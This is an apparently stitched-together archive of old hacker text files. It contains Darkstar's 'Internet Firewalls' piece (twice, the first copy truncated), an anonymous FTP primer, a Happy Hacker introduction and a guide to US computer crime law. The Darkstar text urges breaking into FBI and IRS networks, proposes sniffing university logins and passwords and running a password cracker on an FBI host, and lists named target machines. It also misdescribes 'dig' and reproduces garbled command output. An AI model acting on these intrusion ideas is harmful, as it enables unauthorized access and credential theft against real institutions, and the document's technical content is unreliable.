Apparently the FBI,CIA,IRS and other such secure conscious departments all have
computers with ip set up so they only have to sit there and make sure that the
rest of their small network is secure, they are called 'firewalls' and are easy
to hack if u know wot u are doing. apparently on unix machines there is an ftp
command called 'dig' if u login to anonymous ftp sites u can get the binary file
off them. if you dig certain addresses that you know to be behind a firewall
you can find information about the site. it gives you teh address of all such
sites with a certain name in it such as
dig fbi.gov any any
this will give you output like this
;; QUESTIONS:
;; fbi.gov, type = ANY, class = ANY
;; ANSWERS:
fbi.gov. 172800 NS NS.UU.NET.
fbi.gov. 172800 NS UUCP-GW-1.PA.DEC.COM.
fbi.gov. 1800 UUC-2.PA.DEC.COM.
fbi2800ET.
fbi.gov. 172 GERS.DU.
;; AUTHORITYv. NS.UU.NET.
UUCP-GWA.DEOM.
FBIv. 172800 NS NS.EU.7280 NS RECORDS:
NS.UU.T. 172800 137.39.1.3
UUCP-GW-1.0.18
UUCP-GW-2.PA.DEC.COM. 172800 A 0.19
NS.EU.NET.11/mbobthat
NS1.RUTGERS.EDU. 17280; ts, ans fo24 msecsent 2 o many it?
(this looks a mess as it was buffered from irc with someone who had a unix in
front of them and did this for me).
Basically you can see from here where the other nodes are that incorporate
fbi.gov.
Recently I have also found that UTS actually switches packets through to the FBI
firewall to be allowed or denied access. This brings me to the second use for
the FBI firewall. It seems that at times they DO want people from outside the
wall to be able to access their computers. And to do this they have set up a
file with addresses that are allowed to access the computers behind the wall.
Now by logging UTS with one of the various logging programs I'd say that these
nodes could be easily found, as the programs (the good ones) log where the
connections are made from and to and the login id and password of course.
The only problem with this is that I have found UTS to be one of the most secure
universities on the network in sydney. However nothing is impossible and UTS is
certainly not hack proof.
The most interesting feature of the Wall is it's CPU power. I am wondering what
it could do with a good unix version of Killer Cracker running on it! ;)
Imagine 'Hacker Caught running Password Hacking programs on FBI's security
Computer' hahaha nice... anyhow the idea is NOT to get caught. ;)
Anyhow down here I will list a few interesting nodes down for your testing.
ARD.FBI.GOV - FBI's Firewall computer.
PBI.FBI.GOV - Unknown FBI node behind firewall.
ULTIMA.SOCS.UTS.OZ.AU - UTS SunOS.
csdvax.csd.unsw.edu.au - UNSW's vax for students mainly.
hydra.maths.unsw.edu.au - UNSW's math unix system.
dslt4a.faceng.su.oz.au - Sydney Uni's Faculty Enginerring Computer.(easy)
IRS.GOV - The IRS of course. ;)
I wouldn't be surprised to learn that the cia was CIA.GOV or something stupid
like that so I might try it when I get back on the net.
l8r,
Darkstar.
+-----------------------------------------------------------------------------+
| Ring TAF BBS 8993298 to leave me mail. |
| 12 am to 8 am EST Australia. |
| VISA! Don't leave the net without it! ;) |
+-----------------------------------------------------------------------------+
+179
View File
@@ -0,0 +1,179 @@
Unauthorised Access UK 0636-708063 10pm-7am 12oo/24oo
Anonymous FTP: questions, answers, etc.
odin@pilot.njin.net
January 5, 1990
This is a document I pieced together from various
sources. It is not a definitive guide to ftp, but just
something to give a novice a general idea of what it is and
how to do it.
What is FTP?
FTP (File Transfer Protocol) allows a person to
transfer files between two computers, generally connected
via the Internet. If your system has FTP and is connected
to the Internet, you can access very large amounts of
archives available on a number of systems. If you are on
Bitnet or a UUCP host, you should look for servers that work
through the mail. A good source of information on archives
in general, is the Usenet newsgroup comp.archives.
What is Anonymous FTP?
Many systems throughout the Internet offer files
through anonymous FTP. These include software, documents
of various sorts, and files for configuring networks.
Archives for electronic mailing lists are often stored
available through anonymous FTP. Note that all this is
subject to change.
Commands
All the normal FTP commands may be used to retrieve
files. Some FTP commands are the same on different comput-
ers, but others are not. Usually, FTP will list the com-
mands if you type "help" type a question mark (?). Also,
your computer's help command may have information about FTP.
Try man ftp or man ftpd.
Some useful commands available on most systems include:
get copy a file from the remote computer to yours
ls/dir list the files in the current directory
cd Change directory
binary Switch to binary mode. For transferring binary files
ascii Switch to ascii mode. Ascii mode is the default mode
Procedure
Anonymous ftp is a facility offered by many machines on
the Internet. This permits you to log in with the user name
'anonymous' or the user name 'ftp'. When prompted for a
password, type your e-mail address -- it's not necessary,
but it's a courtesy for those sites that like to know who is
making use of their facility. Be courteous.
You can then look around and retrieve files. (Most
anonymous ftp sites do not permit people to store files)
Typically, a directory called 'pub' is where the
interesting things are stored. Some sites will have a file
with a name like ls-lR, that contains a complete list of the
files on that site. Otherwise, you can type ls -lR and get
such a listing -- for some sites, this can take a LONG time.
Usually, files are grouped in archive files, so you
don't have to get many small files separately. The most com-
mon archival file format for the Internet is tar. Occasion-
ally, people use shell archives (shar) instead. tar archives
can be unpacked by running the tar command -- you may want
to first do a 'tar t' on the file to see what it contains
before unpacking it. Be careful when unpacking shell
archives since they have to be run through the Bourne shell
to unpack them. (The simplest way is to use the unshar com-
mand)
Files are often stored compressed -- for Unix, the most
common scheme is the compress program, indicated by a .Z
suffix on the file name. Sometimes, people use programs
like arc or zoo, which are combined archival and compression
formats. (There are probably other archival formats as well
- talk to the systems staff if you encounter them and don't
know how to deal with them)
When retrieving non-text files, you must use binary
mode, otherwise the file gets messed up. To do this, use the
'binary' command. (It's safe to set this for text files. If
the site at the other end is non-Unix, you may need to use
some other mode -- see the documents for that site and for
ftp)
The simplest way to initiate FTP would be to give the
command 'ftp <system-name>', where <system-name> is the
remote system you are connecting to, either a name (wsmr-
simtel20.army.mil, if you have an entry in /etc/hosts or are
accessing a Domain-name Server) or the InterNet address
(26.2.0.74, for Simtel20). After a short wait, you will be
prompted for your username. If you do not have an account
on the remote system, some systems allow you to use
'anonymous'. This gives you a restricted access path.
You would then be prompted for a password. Some sys-
tems will tell you to send your real identity as the pass-
word. What you type doesn't matter, but it is suggested to
give your mail address. Other systems need a password of
'guest', or something similar.
After that, you should receive the FTP prompt (usually
ftp>), and now have access. You can get a directory of
files be giving a 'dir' command, or if the remote system is
Unix-based, 'ls -l' will give the familiar output. On Sim-
tel20, there is a file available in the default anonymous
ftp directory that explains what Simtel20 is, and where
files are located. The name is 'SIMTEL-ARCHIVES.INFO.nn,
where ".nn" is a file generation number. You don't need to
specify the file generation number when requesting the file.
In fact, it's better not to because you will always get the
latest generation that way.
Unix systems will all have the familiar directory
structure, and moving around is done with the familiar 'cd'
or 'cwd' command. TOPS-20 systems have a different struc-
ture, but movement is still accomplished with the 'cd' com-
mand.
Different systems have different organizations for
their files, and the above example is just the way I have it
set up. By 'poking' around other systems, you can learn how
their files are set up, and zip around much faster. Note,
however, that FTP will not allow you outside the FTP 'root'
directory, usually >ftp on most systems. So, poking about
the entire system is not permitted.
File types
These are the common Unix file types:
Suffix FTP Type
.Z bin compress
.arc bin ARChive
.shar ascii SHell ARchive
.tar bin Tape ARchive
.uu ascii uuencode/uudecode
.zoo bin Zoo
However, there are more file compression types than those
listed above. Below is a some mail I received recently
describing how to get a document describing a much larger
set of file compression methods and the programs used.
----
From mjones@ux1.cso.uiuc.edu Wed Aug 15 17:42:33 1990
Date: Wed, 15 Aug 90 16:42:51 -0500
From: Mike Jones <mjones@ux1.cso.uiuc.edu>
To: odin@pilot.njin.net
Subject: additional info for ftp.list header?
Hello, my name is Mike Jones. I am a student working at the University of
Illinois. I have been compiling a list of file compression and archiving
techniques. My supervisor suggested I ask you if this might be worth
mentioning in the header of the ftp.list. What it shows is the names of
all file compression/archiving methods known to us and the programs to
undo the compression/archive on PC, Mac, Unix, VM/CMS, and Amiga systems.
This could be helpful to people new to ftp that don't know how to unpackage
the file they have just transferred. The list can be seen via anonymous ftp
at: ux1.cso.uiuc.edu
cd doc/pcnet
get compression
get compression2
Thanks you for your time and consideration.
mjones@ux1.cso.uiuc.edu
Downloaded From P-80 Systems 304-744-2253
+112
View File
@@ -0,0 +1,112 @@
+----------------------------------------------------------------------------+
| |
| Internet Firewalls |
| |
| written by |
| |
| DARKSTAR/NFG |
| |
+----------------------------------------------------------------------------+
Ok, The Internet Firewall is a strange beast when you find one. It is for those
of you who don't know, a system that secures off a part of the net for pricate
or more interestingly for government use. You'll find things like the FBI,CIA
etc.. all on the other side of a firewall of some desciption. My research to
date has mainly been into the firewall that the FBI has, as that was the very
first such address I got.
I was hanging around the IRC on csdvax at nsw uni and a friend happened to
mention the address just as he logged off... it was pbi.fbi.gov, so i being the
good little hacker that i am had a pen beside me and wrote it down to look into
later on. Unfortunately this friend of mine is in Israel and was just leaving
when he gave it to me so i didn't have time to ask him anything about it.
l8r on i tried the address and found it came back with 'network unreachable'.
I found this odd as he had given me the address that he obviously had connected
to himself so i was wondering what the fuck was going on right? I got onto irc
and asked a dude in #hack about it. He said the FBI has a firewall and then he
went all quiet and wouldn't say another bloody word about it. Now just about
everyone knows that irc is logged. If you say anything like 'hack' 'hacked'
'password' 'passwd' etc.. the line of text gets written into a log.. and i mean
who wouldn't log it? i would too so u can't blame them. Anyhow i bugged this guy
'til he finally said 'get onto 'talk' and phne me' so i did, i phoned his
account and said 'ok what's the story' and he gave me the following.
Apparently the FBI,CIA,IRS and other such secure conscious departments all have
computers with ip set up so they only have to sit there and make sure that the
rest of their small network is secure, they are called 'firewalls' and are easy
to hack if u know wot u are doing. apparently on unix machines there is an ftp
command called 'dig' if u login to anonymous ftp sites u can get the binary file
off them. if you dig certain addresses that you know to be behind a firewall
you can find information about the site. it gives you teh address of all such
sites with a certain name in it such as
dig fbi.gov any any
this will give you output like this
;; QUESTIONS:
;; fbi.gov, type = ANY, class = ANY
;; ANSWERS:
fbi.gov. 172800 NS NS.UU.NET.
fbi.gov. 172800 NS UUCP-GW-1.PA.DEC.COM.
fbi.gov. 1800 UUC-2.PA.DEC.COM.
fbi2800ET.
fbi.gov. 172 GERS.DU.
;; AUTHORITYv. NS.UU.NET.
UUCP-GWA.DEOM.
FBIv. 172800 NS NS.EU.7280 NS RECORDS:
NS.UU.T. 172800 137.39.1.3
UUCP-GW-1.0.18
UUCP-GW-2.PA.DEC.COM. 172800 A 0.19
NS.EU.NET.11/mbobthat
NS1.RUTGERS.EDU. 17280; ts, ans fo24 msecsent 2 o many it?
(this looks a mess as it was buffered from irc with someone who had a unix in
front of them and did this for me).
Basically you can see from here where the other nodes are that incorporate
fbi.gov.
Recently I have also found that UTS actually switches packets through to the FBI
firewall to be allowed or denied access. This brings me to the second use for
the FBI firewall. It seems that at times they DO want people from outside the
wall to be able to access their computers. And to do this they have set up a
file with addresses that are allowed to access the computers behind the wall.
Now by logging UTS with one of the various logging programs I'd say that these
nodes could be easily found, as the programs (the good ones) log where the
connections are made from and to and the login id and password of course.
The only problem with this is that I have found UTS to be one of the most secure
universities on the network in sydney. However nothing is impossible and UTS is
certainly not hack proof.
The most interesting feature of the Wall is it's CPU power. I am wondering what
it could do with a good unix version of Killer Cracker running on it! ;)
Imagine 'Hacker Caught running Password Hacking programs on FBI's security
Computer' hahaha nice... anyhow the idea is NOT to get caught. ;)
Anyhow down here I will list a few interesting nodes down for your testing.
ARD.FBI.GOV - FBI's Firewall computer.
PBI.FBI.GOV - Unknown FBI node behind firewall.
ULTIMA.SOCS.UTS.OZ.AU - UTS SunOS.
csdvax.csd.unsw.edu.au - UNSW's vax for students mainly.
hydra.maths.unsw.edu.au - UNSW's math unix system.
dslt4a.faceng.su.oz.au - Sydney Uni's Faculty Enginerring Computer.(easy)
IRS.GOV - The IRS of course. ;)
I wouldn't be surprised to learn that the cia was CIA.GOV or something stupid
like that so I might try it when I get back on the net.
l8r,
Darkstar.
+-----------------------------------------------------------------------------+
| Ring TAF BBS 8993298 to leave me mail. |
| 12 am to 8 am EST Australia. |
| VISA! Don't leave the net without it! ;) |
+-----------------------------------------------------------------------------+
+244
View File
@@ -0,0 +1,244 @@
___________________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Beginners Series #1
So you want to be a harmless hacker?
____________________________________________________________
“You mean you can hack without breaking the law?"
That was the voice of a high school freshman. He had me on the phone because
his father had just taken away his computer. His offense? Cracking into my
Internet account. The boy had hoped to impress me with how "kewl" he was.
But before I realized he had gotten in, a sysadmin at my ISP had spotted the
kids harmless explorations and had alerted the parents. Now the boy wanted
my help in getting back on line.
I told the kid that I sympathized with his father. What if the sysadmin and
I had been major grouches? This kid could have wound up in juvenile
detention. Now I dont agree with putting harmless hackers in jail, and I
would never have testified against him. But thats what some people do to
folks who go snooping in other peoples computer accounts -- even when the
culprit does no harm. This boy needs to learn how to keep out of trouble!
Hacking is the most exhilarating game on the planet. But it stops being fun
when you end up in a cell with a roommate named "Spike." But hacking doesn't
have to mean breaking laws. In this book we teach safe hacking so that you
dont have to keep looking back over your shoulders for narcs and cops.
What we're talking about is hacking as a healthy recreation, and as a free
education that can qualify you to get a high paying job. In fact, many
network systems administrators, computer scientists and computer security
experts first learned their professions, not in some college program, but
from the hacker culture. And you may be surprised to discover that
ultimately the Internet is safeguarded not by law enforcement agencies, not
by giant corporations, but by a worldwide network of, yes, hackers.
You, too, can become one of us.
And -- hacking can be surprisingly easy. Heck, if I can do it, anyone can!
Regardless of why you want to be a hacker, it is definitely a way to have
fun, impress your friends, and get dates. If you are a female hacker you
become totally irresistible to men. Take my word for it!;^D
These Guides to (mostly) Harmless Hacking can be your gateway into this
world. After reading just a few of these Guides you will be able to pull off
stunts that will be legal, phun, and will impress the heck out of your friends.
These Guides can equip you to become one of the vigilantes that keeps the
Internet from being destroyed by bad guys. Especially spammers. Heh, heh,
heh. You can also learn how to keep the bad guys from messing with your
Internet account, email, and personal computer. Youll learn not to be
frightened by silly hoaxes that pranksters use to keep the average Internet
user in a tizzy.
If you hang in with us through a year or so, you can learn enough and meet
the people on our email list and IRC channel who can help you to become
truly elite.
However, before you plunge into the hacker subculture, be prepared for that
hacker attitude. You have been warned.
So...welcome to the adventure of hacking!
WHAT DO I NEED IN ORDER TO HACK?
You may wonder whether hackers need expensive computer equipment and a shelf
full of technical manuals. The answer is NO! Hacking can be surprisingly
easy! Better yet, if you know how to search the Web, you can find almost any
computer information you need for free.
In fact, hacking is so easy that if you have an on-line service and know how
to send and read email, you can start hacking immediately. The GTMHH
Beginners Series #2 will show you where you can download special
hacker-friendly programs for Windows that are absolutely free. And well
show you some easy hacker tricks you can use them for.
Now suppose you want to become an elite hacker? All you will really need is
an inexpensive "shell account" with an Internet Service Provider. In the
GTMHH Beginners Series #3 we will tell you how to get a shell account, log
on, and start playing the greatest game on Earth: Unix hacking! Then in
Vol.s I, II, and III of the GTMHH you can get into Unix hacking seriously.
You can even make it into the ranks of the Uberhackers without loading up on
expensive computer equipment. In Vol. II we introduce Linux, the free
hacker-friendly operating system. It will even run on a 386 PC with just 2
Mb RAM! Linux is so good that many Internet Service Providers use it to run
their systems.
In Vol. III we will also introduce Perl, the shell programming language
beloved of Uberhackers. We will even teach some seriously deadly hacker
"exploits" that run on Perl using Linux. OK, you could use most of these
exploits to do illegal things. But they are only illegal if you run them
against someone elses computer without their permission. You can run any
program in this book on your own computer, or your (consenting) friends
computer -- if you dare! Hey, seriously, nothing in this book will actually
hurt your computer, unless you decide to trash it on purpose.
We will also open the gateway to an amazing underground where you can stay
on top of almost every discovery of computer security flaws. You can learn
how to either exploit them -- or defend your computer against them!
About the Guides to (mostly) Harmless Hacking
We have noticed that there are lots of books that glamorize hackers. To read
these books you would think that it takes many years of brilliant work to
become one. Of course we hackers love to perpetuate this myth because it
makes us look so incredibly kewl.
But how many books are out there that tell the beginner step by step how to
actually do this hacking stuph? None! Seriously, have you ever read _Secrets
of a Superhacker_ by The Knightmare (Loomponics, 1994) or _Forbidden Secrets
of the Legion of Doom Hackers_ by Salacious Crumb (St. Mahoun Books, 1994)?
They are full of vague and out of date stuph. Give me a break.
And if you get on one of the hacker news groups on the Internet and ask
people how to do stuph, some of them insult and make fun of you. OK, they
all make fun of you.
We see many hackers making a big deal of themselves and being mysterious and
refusing to help others learn how to hack. Why? Because they don't want you
to know the truth, which is that most of what they are doing is really very
simple!
Well, we thought about this. We, too, could enjoy the pleasure of insulting
people who ask us how to hack. Or we could get big egos by actually teaching
thousands of people how to hack. Muhahaha.
How to Use the Guides to (mostly) Harmless Hacking
If you know how to use a personal computer and are on the Internet, you
already know enough to start learning to be a hacker. You don't even need to
read every single Guide to (mostly) Harmless Hacking in order to become a
hacker.
You can count on anything in Volumes I, II and III being so easy that you
can jump in about anywhere and just follow instructions.
But if your plan is to become "elite," you will do better if you read all
the Guides, check out the many Web sites and newsgroups to which we will
point you, and find a mentor among the many talented hackers who post to our
Hackers forum or chat on our IRC server at http://www.infowar.com, and on
the Happy Hacker email list (email hacker@techbroker.com with message
“subscribe”).
If your goal is to become an Uberhacker, the Guides will end up being only
the first in a mountain of material that you will need to study. However, we
offer a study strategy that can aid you in your quest to reach the pinnacle
of hacking.
How to Not Get Busted
One slight problem with hacking is that if you step over the line, you can
go to jail. We will do our best to warn you when we describe hacks that
could get you into trouble with the law. But we are not attorneys or experts
on cyberlaw. In addition, every state and every country has its own laws.
And these laws keep on changing. So you have to use a little sense.
However, we have a Guide to (mostly) Harmless Hacking Computer Crime Law
Series to help you avoid some pitfalls.
But the best protection against getting busted is the Golden Rule. If you
are about to do something that you would not like to have done to you,
forget it. Do hacks that make the world a better place, or that are at least
fun and harmless, and you should be able to keep out of trouble.
So if you get an idea from the Guides to (mostly) Harmless Hacking that
helps you to do something malicious or destructive, it's your problem if you
end up being the next hacker behind bars. Hey, the law won't care if the
guy whose computer you trash was being a d***. It won't care that the giant
corporation whose database you filched shafted your best buddy once. They
will only care that you broke the law.
To some people it may sound like phun to become a national sensation in the
latest hysteria over Evil Genius hackers. But after the trial, when some
reader of these Guides ends up being the reluctant "girlfriend" of a convict
named Spike, how happy will his news clippings make him?
Conventions Used in the Guides
You've probably already noticed that we spell some words funny, like "kewl"
and "phun." These are hacker slang terms. Since we often communicate with
each other via email, most of our slang consists of ordinary words with
extraordinary spellings. For example, a hacker might spell "elite" as
"3l1t3," with 3's substituting for e's and 1's for i's. He or she may even
spell "elite" as "31337. The Guides sometimes use these slang spellings to
help you learn how to write email like a hacker.
Of course, the cute spelling stuph we use will go out of date fast. So we do
not guarantee that if you use this slang, people will read your email and
think, "Ohhh, you must be an Evil Genius! I'm sooo impressed!"
Take it from us, guys who need to keep on inventing new slang to prove they
are "k-rad 3l1t3" are often lusers and lamers. So if you don't want to use
any of the hacker slang of this book, that's OK by us. Most Uberhackers
don't use slang, either.
Who Are You?
We've made some assumptions about who you are and why you are reading these
Guides:
· You own a PC or Macintosh personal computer
· You are on-line with the Internet
· You have a sense of humor and adventure and want to express it by hacking
· Or -- you want to impress your friends and pick up chicks (or guys) by
making them think you are an Evil Genius
So, does this picture fit you? If so, OK, d00dz, start your computers. Are
you ready to hack?
_________________________________________________________
Want to see back issues of Guide to (mostly) Harmless Hacking? See either
http://www.vcalpha.com/silicon/void-f.html or
http://www3.ns.sympatico.ca/loukas.halo8/HappyHacker/
http://www.geocities.com/TimesSquare/Arcade/4594
We have a discussion group and archives hosted at
http://www.infowar.com/cgi-shl/login.exe.
Chat with us on the Happy Hacker IRC channel. If your browser can use Java,
just direct your browser to www.infowar.com, click on chat, and choose the
#hackers channel.
Subscribe to our email list by emailing to hacker@techbroker.com with
message "subscribe"
Want to share some kewl stuph with the Happy Hacker list? Correct mistakes?
Send your messages to hacker@techbroker.com. To send me confidential email
(please, no discussions of illegal activities) use carolyn@techbroker.com
and be sure to state in your message that you want me to keep this
confidential. If you wish your message posted anonymously, please say so!
Direct flames to dev/null@techbroker.com. Happy hacking!
Copyright 1997 Carolyn P. Meinel. You may forward or post on your Web site
this GUIDE TO (mostly) HARMLESS HACKING as long as you leave this notice at
the end..
________________________________________________________
Carolyn Meinel
M/B Research -- The Technology Brokers
+415
View File
@@ -0,0 +1,415 @@
____________________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Computer Crime Law Issue #1
By Peter Thiruselvam <pselvam@ix.netcom.com> and Carolyn Meinel
____________________________________________________________
Tired of reading all those “You could go to jail” notes in these guides? Who
says those things are crimes? Well, now you can get the first in a series of
Guides to the gory details of exactly what laws were trying to keep you
from accidentally breaking, and who will bust you if you go ahead with the
crime anyhow.
This Guide covers the two most important US Federal computer crime statutes:
18 USC, Chapter 47, Section 1029, and Section 1030, known as the “Computer
Fraud and Abuse Act of 1986.”
Now these are not the *only* computer crime laws. Its just that these are
the two most important laws used in US Federal Courts to put computer
criminals behind bars.
COMPUTER CRIMES: HOW COMMON? HOW OFTEN ARE THEY REPORTED?
The FBIs national Computer Crimes Squad estimates that between 85 and 97
percent of computer intrusions are not even detected. In a recent test
sponsored by the Department of Defense, the statistics were startling.
Attempts were made to attack a total of 8932 systems participating in the
test. 7860 of those systems were successfully penetrated. The management of
only 390 of those 7860 systems detected the attacks, and only 19 of the
managers reported the attacks (Richard Power, -Current and Future Danger: A
CSI Primer on Computer Crime and Information Warfare_, Computer Security
Institute, 1995.)
The reason so few attacks were reported was “mainly because organizations
frequently fear their employees, clients, and stockholders will lose faith
in them if they admit that their computers have been attacked.” Besides, of
the computer crimes that *are* reported, few are ever solved.
SO, ARE HACKERS A BIG CAUSE OF COMPUTER DISASTERS?
According to the Computer Security Institute, these are the types of
computer crime and other losses:
· Human errors - 55%
· Physical security problems - 20%(e.g., natural disasters, power problems)
· Insider attacks conducted for the purpose of profiting from computer crime
- 10%
· Disgruntled employees seeking revenge - 9%
· Viruses - 4%
· Outsider attacks - 1-3%
So when you consider that many of the outsider attacks come from
professional computer criminals -- many of whom are employees of the
competitors of the victims, hackers are responsible for almost no damage at
all to computers.
In fact, on the average, it has been our experience that hackers do far more
good than harm.
Yes, we are saying that the recreational hacker who just likes to play
around with other peoples computers is not the guy to be afraid of. Its
far more likely to be some guy in a suit who is an employee of his victim.
But you would never know it from the media, would you?
OVERVIEW OF US FEDERAL LAWS
In general, a computer crime breaks federal laws when it falls into one of
these categories:
· It involves the theft or compromise of national defense, foreign
relations, atomic energy, or other restricted information.
· It involves a computer owned by a U.S. government department or agency.
· It involves a bank or most other types of financial institutions.
· It involves interstate or foreign communications.
· it involves people or computers in other states or countries.
Of these offenses, the FBI ordinarily has jurisdiction over cases involving
national security, terrorism, banking, and organized crime. The U.S. Secret
Service has jurisdiction whenever the Treasury Department is victimized or
whenever computers are attacked that are not under FBI or U.S. Secret
Service jurisdiction (e.g., in cases of password or access code theft). In
certain federal cases, the customs Department, the Commerce Department, or a
military organization, such as the Air Force Office of Investigations, may
have jurisdiction.
In the United States, a number of federal laws protect against attacks on
computers, misuse of passwords, electronic invasions of privacy, and other
transgressions. The Computer Fraud and Abuse Act of 1986 is the main piece
of legislation that governs most common computer crimes, although many
other laws may be used to prosecute different types of computer crime. The
act amended Title 18 United States Code §1030. It also complemented the
Electronic Communications Privacy Act of 1986, which outlawed the
unauthorized interception of digital communications and had just recently
been passed. The Computer Abuse Amendments Act of 1994 expanded the 1986 Act
to address the transmission of viruses and other harmful code.
In addition to federal laws, most of the states have adopted their own
computer crime laws. A number of countries outside the United States have
also passed legislation defining and prohibiting computer crime.
THE BIG NO NOS -- THE TWO MOST IMPORTANT FEDERAL CRIME LAWS
As mentioned above, the two most important US federal computer crime laws
are 18 USC: Chapter 47, Sections 1029 and 1030.
SECTION 1029
Section 1029 prohibits fraud and related activity that is made possible by
counterfeit access devices such as PINs, credit cards, account numbers, and
various types of electronic identifiers. The nine areas of criminal
activity covered by Section 1029 are listed below. All *require* that the
offense involved interstate or foreign commerce.
1. Producing, using, or trafficking in counterfeit access devices. (The
offense must be committed knowingly and with intent to defraud.)
Penalty: Fine of $50,000 or twice the value of the crime and/or up to 15
years in prison, $100,000 and/or up to 20 years if repeat offense.
2. Using or obtaining unauthorized access devices to obtain anything of
value totaling $1000 or more during a one-year period. (The offense must be
committed knowingly and with intent to defraud.)
Penalty: Fine of $10,000 or twice the value of the crime and/or up to 10
years in prison, $100,000 and/or up to 20 years if repeat offense.
3. Possessing 15 or more counterfeit or unauthorized access devices. (The
offense must be committed knowingly and with intent to defraud.)
Penalty: Fine of $10,000 or twice the value of the crime and/or up to 10
years in prison, $100,000 and/or up to 20 years if repeat offense.
4. Producing, trafficking in, or having device-making equipment. (The
offense must be committed knowingly and with intent to defraud.)
Penalty: Fine of $50,000 or twice the value of the of the crime and/or up
to 15 years in prison, $1,000,000 and/or up to 20 years if repeat offense.
5. Effecting transactions with access devices issued to another person in
order to receive payment or anything of value totaling $1000 or more during
a one-year period. (The offense must be committed knowingly and with intent
to defraud.)
Penalty: Fine of 10, or twice the value of the crime and/or up to 10 years
in prison, 100,000 and/or up to 20 years if repeat offense.
6. Soliciting a person for the purpose of offering an access device or
selling information that can be used to obtain an access device. (The
offense must be committed knowingly and with intent to defraud, and without
the authorization of the issuer of the access device.)
Penalty: Fine of $50,000 or twice the value of the crime and/or up to 15
years in prison, $100,000 and/or up to 20 years if repeat offense.
7. Using, producing, trafficking in, or having a telecommunications
instruments that has been modified or altered to obtain unauthorized use of
telecommunications services. (The offense must be committed knowingly and
with intent to defraud.)
This would cover use of “Red Boxes,” “Blue Boxes” (yes, they still work on
some telephone networks) and cloned cell phones when the legitimate owner of
the phone you have cloned has not agreed to it being cloned.
Penalty: Fine of $50,000 or twice the value of the crime and/or up to 15
years in prison, $100,000 and/or up to 20 years if repeat offense.
8. Using, producing, trafficking in, or having a scanning receiver or
hardware or software used to alter or modify telecommunications instruments
to obtain unauthorized access to telecommunications services.
This outlaws the scanners that people so commonly use to snoop on cell phone
calls. We just had a big scandal when the news media got a hold of an
intercepted cell phone call from Speaker of the US House of Representatives
Newt Gingrich.
Penalty: Fine of $50,000 or twice the value of the crime and/or up to 15
years in prison, $100,000 and/or up to 20 years if repeat offense.
9. Causing or arranging for a person to present, to a credit card system
member or its agent for payment, records of transactions made by an access
device.(The offense must be committed knowingly and with intent to defraud,
and without the authorization of the credit card system member or its agent.
Penalty: Fine of $10,000 or twice the value of the crime and/or up to 10
years in prison, $100,000 and/or up to 20 years if repeat offense.
SECTION 1030
18 USC, Chapter 47, Section 1030, enacted as part of the Computer Fraud and
Abuse Act of 1986, prohibits unauthorized or fraudulent access to government
computers, and establishes penalties for such access. This act is one of
the few pieces of federal legislation solely concerned with computers.
Under the Computer Fraud and Abuse Act, the U.S. Secret Service and the FBI
explicitly have been given jurisdiction to investigate the offenses defined
under this act.
The six areas of criminal activity covered by Section 1030 are:
1. Acquiring national defense, foreign relations, or restricted atomic
energy information with the intent or reason to believe that the information
can be used to injure the United States or to the advantage of any foreign
nation. (The offense must be committed knowingly by accessing a computer
without authorization or exceeding authorized access.)
2. Obtaining information in a financial record of a financial institution
or a card issuer, or information on a consumer in a file of a consumer
reporting agency. (The offense must be committed intentionally by
accessing a computer without authorization or exceeding authorized access.)
Important note: recently on the dc-stuff hackers list a fellow whose name
we shall not repeat claimed to have “hacked TRW” to get a report on someone
which he posted to the list. We hope this fellow was lying and simply paid
the fee to purchase the report.
Penalty: Fine and/or up to 1 year in prison, up to 10 years if repeat offense.
3. Affecting a computer exclusively for the use of a U.S. government
department or agency or, if it is not exclusive, one used for the government
where the offense adversely affects the use of the governments operation of
the computer. (The offense must be committed intentionally by accessing a
computer without authorization.)
This could apply to syn flood and killer ping as well as other denial of
service attacks, as well as breaking into a computer and messing around.
Please remember to tiptoe around computers with .mil or .gov domain names!
Penalty: Fine and/or up to 1 year in prison, up to 10 years if repeat offense.
4. Furthering a fraud by accessing a federal interest computer and
obtaining anything of value, unless the fraud and the thing obtained
consists only of the use of the computer. (The offense must be committed
knowingly, with intent to defraud, and without authorization or exceeding
authorization.)[The governments view of “federal interest computer” is
defined below]
Watch out! Even if you download copies of programs just to study them, this
law means if the owner of the program says, “Yeah, Id say its worth a
million dollars,” youre in deep trouble.
Penalty: Fine and/or up to 5 years in prison, up to 10 years if repeat offense.
5. Through use of a computer used in interstate commerce, knowingly
causing the transmission of a program, information, code, or command to a
computer system. There are two separate scenarios:
a. In this scenario, (I) the person causing the transmission intends
it to damage the computer or deny use to it; and (ii) the transmission
occurs without the authorization of the computer owners or operators, and
causes $1000 or more in loss or damage, or modifies or impairs, or
potentially modifies or impairs, a medical treatment or examination.
The most common way someone gets into trouble with this part of the law is
when trying to cover tracks after breaking into a computer. While editing
or, worse yet, erasing various files, the intruder may accidentally erase
something important. Or some command he or she gives may accidentally mess
things up. Yeah, just try to prove it was an accident. Just ask any systems
administrator about giving commands as root. Even when you know a computer
like the back of your hand it is too easy to mess up.
A simple email bomb attack, “killer ping,” flood ping, syn flood, and those
huge numbers of Windows NT exploits where sending simple commands to many of
its ports causes a crash could also break this law. So even if you are a
newbie hacker, some of the simplest exploits can land you in deep crap!
Penalty with intent to harm: Fine and/or up to 5 years in prison, up to 10
years if repeat offense.
b. In this scenario, (I) the person causing the transmission does not
intend the damage but operates with reckless disregard of the risk that the
transmission will cause damage to the computer owners or operators, and
causes $1000 or more in loss or damage, or modifies or impairs, or
potentially modifies or impairs, a medical treatment or examination.
This means that even if you can prove you harmed the computer by accident,
you still may go to prison.
Penalty for acting with reckless disregard: Fine and/or up to 1 year in prison.
6. Furthering a fraud by trafficking in passwords or similar information
which will allow a computer to be accessed without authorization, if the
trafficking affects interstate or foreign commerce or if the computer
affected is used by or for the government. (The offense must be committed
knowingly and with intent to defraud.)
A common way to break this part of the law comes from the desire to boast.
When one hacker finds a way to slip into another persons computer, it can
be really tempting to give out a password to someone else. Pretty soon
dozens of clueless newbies are carelessly messing around the victim
computer. They also boast. Before you know it you are in deep crud.
Penalty: Fine and/or up to 1 year in prison, up to 10 years if repeat offense.
Re: #4 Section 1030 defines a federal interest computer as follows:
1. A computer that is exclusively for use of a financial
institution[defined below] or the U.S. government or, if it is not
exclusive, one used for a financial institution or the U.S. government where
the offense adversely affects the use of the financial institutions or
governments operation of the computer; or
2. A computer that is one of two or more computers used to commit the
offense, not all of which are located in the same state.
This section defines a financial institution as follows:
1. An institution with deposits insured by the Federal Deposit Insurance
Corporation(FDIC).
